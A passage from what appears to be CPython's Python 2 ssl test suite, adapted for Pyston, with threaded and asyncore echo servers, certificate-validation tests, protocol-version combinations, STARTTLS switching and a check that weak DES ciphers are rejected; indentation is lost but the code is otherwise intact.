self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(errno.ECONNREFUSED,
s.connect_ex(("svn.python.org", 444)))
finally:
s.close()
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with test_support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with test_support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLError, err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([s], [], [])
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [s], [])
else:
raise
s.close()
if test_support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
with test_support.transient_internet("svn.python.org"):
pem = ssl.get_server_certificate(("svn.python.org", 443),
ssl.PROTOCOL_SSLv23)
if not pem:
self.fail("No server certificate on svn.python.org:443!")
try:
pem = ssl.get_server_certificate(("svn.python.org", 443),
ssl.PROTOCOL_SSLv23,
ca_certs=CERTFILE)
except ssl.SSLError:
#should fail
pass
else:
self.fail("Got server certificate %s for svn.python.org!" % pem)
pem = ssl.get_server_certificate(("svn.python.org", 443),
ssl.PROTOCOL_SSLv23,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
if not pem:
self.fail("No server certificate on svn.python.org:443!")
if test_support.verbose:
sys.stdout.write("\nVerified certificate for svn.python.org:443 is\n%s\n" % pem)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
self.skipTest("remote host needs SNI, only available on Python 3.2+")
# NOTE: https://sha2.hboeck.de is another possible test host
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with test_support.transient_internet("sha256.tbs-internet.com"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=sha256_cert,)
try:
s.connect(remote)
if test_support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock):
self.server = server
self.running = False
self.sock = connsock
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def show_conn_details(self):
if self.server.certreqs == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if test_support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if test_support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if test_support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
def wrap_conn(self):
try:
self.sslconn = ssl.wrap_socket(self.sock, server_side=True,
certfile=self.server.certificate,
ssl_version=self.server.protocol,
ca_certs=self.server.cacerts,
cert_reqs=self.server.certreqs,
ciphers=self.server.ciphers)
except ssl.SSLError as e:
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " +
str(self.sock.getpeername()) + ":\n")
self.close()
self.running = False
self.server.stop()
return False
else:
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock._sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if isinstance(self.sock, ssl.SSLSocket):
self.sslconn = self.sock
elif not self.wrap_conn():
return
self.show_conn_details()
while self.running:
try:
msg = self.read()
if not msg:
# eof, so quit this handler
self.running = False
self.close()
elif msg.strip() == 'over':
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif self.server.starttls_server and msg.strip() == 'STARTTLS':
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write("OK\n")
if not self.wrap_conn():
return
elif self.server.starttls_server and self.sslconn and msg.strip() == 'ENDTLS':
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write("OK\n")
self.sslconn.unwrap()
self.sslconn = None
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
else:
if (test_support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %s (%s), sending back %s (%s)...\n"
% (repr(msg), ctype, repr(msg.lower()), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
wrap_accepting_socket=False, ciphers=None):
if ssl_version is None:
ssl_version = ssl.PROTOCOL_TLSv1
if certreqs is None:
certreqs = ssl.CERT_NONE
self.certificate = certificate
self.protocol = ssl_version
self.certreqs = certreqs
self.cacerts = cacerts
self.ciphers = ciphers
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.flag = None
if wrap_accepting_socket:
self.sock = ssl.wrap_socket(self.sock, server_side=True,
certfile=self.certificate,
cert_reqs = self.certreqs,
ca_certs = self.cacerts,
ssl_version = self.protocol,
ciphers = self.ciphers)
if test_support.verbose and self.chatty:
sys.stdout.write(' server: wrapped server socket as %s\n' % str(self.sock))
self.port = test_support.bind_port(self.sock)
self.active = False
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if test_support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ str(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
asyncore.dispatcher_with_send.__init__(self, conn)
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
self._ssl_accepting = True
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if data and data.strip() != 'over':
self.send(data.lower())
def handle_close(self):
self.close()
if test_support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = test_support.bind_port(self.socket)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if test_support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if test_support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if test_support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if test_support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
asyncore.loop(0.05)
def stop(self):
self.active = False
self.server.close()
class SocketServerHTTPSServer(threading.Thread):
class HTTPSServer(HTTPServer):
def __init__(self, server_address, RequestHandlerClass, certfile):
HTTPServer.__init__(self, server_address, RequestHandlerClass)
# we assume the certfile contains both private key and certificate
self.certfile = certfile
self.allow_reuse_address = True
def __str__(self):
return ('<%s %s:%s>' %
(self.__class__.__name__,
self.server_name,
self.server_port))
def get_request(self):
# override this to wrap socket with SSL
sock, addr = self.socket.accept()
sslconn = ssl.wrap_socket(sock, server_side=True,
certfile=self.certfile)
return sslconn, addr
class RootedHTTPRequestHandler(SimpleHTTPRequestHandler):
# need to override translate_path to get a known root,
# instead of using os.curdir, since the test could be
# run from anywhere
server_version = "TestHTTPS/1.0"
root = None
def translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = urlparse.urlparse(path)[2]
path = os.path.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = self.root
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in self.root: continue
path = os.path.join(path, word)
return path
def log_message(self, format, *args):
# we override this to suppress logging unless "verbose"
if test_support.verbose:
sys.stdout.write(" server (%s:%d %s):\n [%s] %s\n" %
(self.server.server_address,
self.server.server_port,
self.request.cipher(),
self.log_date_time_string(),
format%args))
def __init__(self, certfile):
self.flag = None
self.RootedHTTPRequestHandler.root = os.path.split(CERTFILE)[0]
self.server = self.HTTPSServer(
(HOST, 0), self.RootedHTTPRequestHandler, certfile)
self.port = self.server.server_port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
if self.flag:
self.flag.set()
self.server.serve_forever(0.05)
def stop(self):
self.server.shutdown()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False)
with server:
try:
s = ssl.wrap_socket(socket.socket(),
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError, x:
if test_support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x[1])
except socket.error, x:
if test_support.verbose:
sys.stdout.write("\nsocket.error is %s\n" % x[1])
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(certfile, protocol, certreqs, cacertsfile,
client_certfile, client_protocol=None, indata="FOO\n",
ciphers=None, chatty=True, connectionchatty=False,
wrap_accepting_socket=False):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
server = ThreadedEchoServer(certfile,
certreqs=certreqs,
ssl_version=protocol,
cacerts=cacertsfile,
ciphers=ciphers,
chatty=chatty,
connectionchatty=connectionchatty,
wrap_accepting_socket=wrap_accepting_socket)
with server:
# try to connect
if client_protocol is None:
client_protocol = protocol
s = ssl.wrap_socket(socket.socket(),
certfile=client_certfile,
ca_certs=cacertsfile,
ciphers=ciphers,
cert_reqs=certreqs,
ssl_version=client_protocol)
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % (repr(arg)))
s.write(arg)
outdata = s.read()
if connectionchatty:
if test_support.verbose:
sys.stdout.write(" client: read %s\n" % repr(outdata))
if outdata != indata.lower():
raise AssertionError(
"bad data <<%s>> (%d) received; expected <<%s>> (%d)\n"
% (outdata[:min(len(outdata),20)], len(outdata),
indata[:min(len(indata),20)].lower(), len(indata)))
s.write("over\n")
if connectionchatty:
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
def try_protocol_combo(server_protocol,
client_protocol,
expect_success,
certsreqs=None):
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if test_support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
try:
# NOTE: we must enable "ALL" ciphers, otherwise an SSLv23 client
# will send an SSLv3 hello (rather than SSLv2) starting from
# OpenSSL 1.0.0 (see issue #8322).
server_params_test(CERTFILE, server_protocol, certsreqs,
CERTFILE, CERTFILE, client_protocol,
ciphers="ALL", chatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an IOError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = test_support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
s.accept()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
c = socket.socket()
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except IOError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if test_support.verbose:
sys.stdout.write("\n")
server_params_test(CERTFILE, ssl.PROTOCOL_TLSv1, ssl.CERT_NONE,
CERTFILE, CERTFILE, ssl.PROTOCOL_TLSv1,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if test_support.verbose:
sys.stdout.write("\n")
s2 = socket.socket()
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_SSLv23,
cacerts=CERTFILE,
chatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_REQUIRED,
ssl_version=ssl.PROTOCOL_SSLv23)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if test_support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
s.close()
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
if not hasattr(ssl, 'PROTOCOL_SSLv2'):
self.skipTest("PROTOCOL_SSLv2 needed")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = ("msg 1", "MSG 2", "STARTTLS", "MSG 3", "msg 4", "ENDTLS", "msg 5", "msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if test_support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % repr(indata))
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
if (indata == "STARTTLS" and
outdata.strip().lower().startswith("ok")):
# STARTTLS ok, switch to secure mode
if test_support.verbose:
sys.stdout.write(
" client: read %s from server, starting TLS...\n"
% repr(outdata))
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif (indata == "ENDTLS" and
outdata.strip().lower().startswith("ok")):
# ENDTLS ok, switch back to clear text
if test_support.verbose:
sys.stdout.write(
" client: read %s from server, ending TLS...\n"
% repr(outdata))
s = conn.unwrap()
wrapped = False
else:
if test_support.verbose:
sys.stdout.write(
" client: read %s from server\n" % repr(outdata))
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write("over\n")
else:
s.send("over\n")
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = SocketServerHTTPSServer(CERTFILE)
flag = threading.Event()
server.start(flag)
# wait for it to start
flag.wait()
# try to connect
try:
if test_support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://127.0.0.1:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
with test_support.check_py3k_warnings():
f = urllib.urlopen(url)
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if test_support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
f.close()
self.assertEqual(d1, d2)
finally:
server.stop()
server.join()
def test_wrapped_accept(self):
"""Check the accept() method on SSL sockets."""
if test_support.verbose:
sys.stdout.write("\n")
server_params_test(CERTFILE, ssl.PROTOCOL_SSLv23, ssl.CERT_REQUIRED,
CERTFILE, CERTFILE, ssl.PROTOCOL_SSLv23,
chatty=True, connectionchatty=True,
wrap_accepting_socket=True)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if test_support.verbose:
sys.stdout.write("\n")
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % (repr(indata)))
s.write(indata)
outdata = s.read()
if test_support.verbose:
sys.stdout.write(" client: read %s\n" % repr(outdata))
if outdata != indata.lower():
self.fail(
"bad data <<%s>> (%d) received; expected <<%s>> (%d)\n"
% (outdata[:min(len(outdata),20)], len(outdata),
indata[:min(len(indata),20)].lower(), len(indata)))
s.write("over\n")
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
def test_recv_send(self):
"""Test recv(), send() and friends."""
if test_support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray("\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray("\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = data_prefix + meth_name
try:
send_meth(indata.encode('ASCII', 'strict'), *args)
outdata = s.read()
outdata = outdata.decode('ASCII', 'strict')
if outdata != indata.lower():
self.fail(
"While sending with <<%s>> bad data "
"<<%r>> (%d) received; "
"expected <<%r>> (%d)\n" % (
meth_name, outdata[:20], len(outdata),
indata[:20], len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<%s>>; "
"expected to succeed.\n" % (meth_name,)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<%s>> failed with unexpected "
"exception message: %s\n" % (
meth_name, e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = data_prefix + meth_name
try:
s.send(indata.encode('ASCII', 'strict'))
outdata = recv_meth(*args)
outdata = outdata.decode('ASCII', 'strict')
if outdata != indata.lower():
self.fail(
"While receiving with <<%s>> bad data "
"<<%r>> (%d) received; "
"expected <<%r>> (%d)\n" % (
meth_name, outdata[:20], len(outdata),
indata[:20], len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<%s>>; "
"expected to succeed.\n" % (meth_name,)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<%s>> failed with unexpected "
"exception message: %s\n" % (
meth_name, e
)
)
# consume data
s.read()
s.write("over\n".encode("ASCII", "strict"))
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = test_support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c = ssl.wrap_socket(c)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_default_ciphers(self):
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
sock = socket.socket()
try:
# Force a set of weak ciphers on our client socket
try:
s = ssl.wrap_socket(sock,
ssl_version=ssl.PROTOCOL_SSLv23,
ciphers="DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with self.assertRaises((OSError, ssl.SSLError)):
s.connect((HOST, server.port))
finally:
sock.close()
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_main(verbose=False):
global CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, NOKIACERT, NULLBYTECERT
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir,
"keycert.pem")
# Pyston change: seems the ca file to svn.python.org is invalid now
# use the system's root ca file temporarilly.
# SVN_PYTHON_ORG_ROOT_CERT = os.path.join(
# os.path.dirname(__file__) or os.curdir,
# "https_svn_python_org_root.pem")
SVN_PYTHON_ORG_ROOT_CERT = '/etc/ssl/certs/ca-certificates.crt'
NOKIACERT = os.path.join(os.path.dirname(__file__) or os.curdir,
"nokia.pem")
NULLBYTECERT = os.path.join(os.path.dirname(__file__) or os.curdir,
"nullbytecert.pem")
if (not os.path.exists(CERTFILE) or
not os.path.exists(SVN_PYTHON_ORG_ROOT_CERT) or
not os.path.exists(NOKIACERT) or
not os.path.exists(NULLBYTECERT)):
raise test_support.TestFailed("Can't read certificate files!")
tests = [BasicTests, BasicSocketTests]
if test_support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = test_support.threading_setup()
if thread_info and test_support.is_resource_enabled('network'):
tests.append(ThreadedTests)
try:
test_support.run_unittest(*tests)
finally:
if _have_threads:
test_support.threading_cleanup(*thread_info)
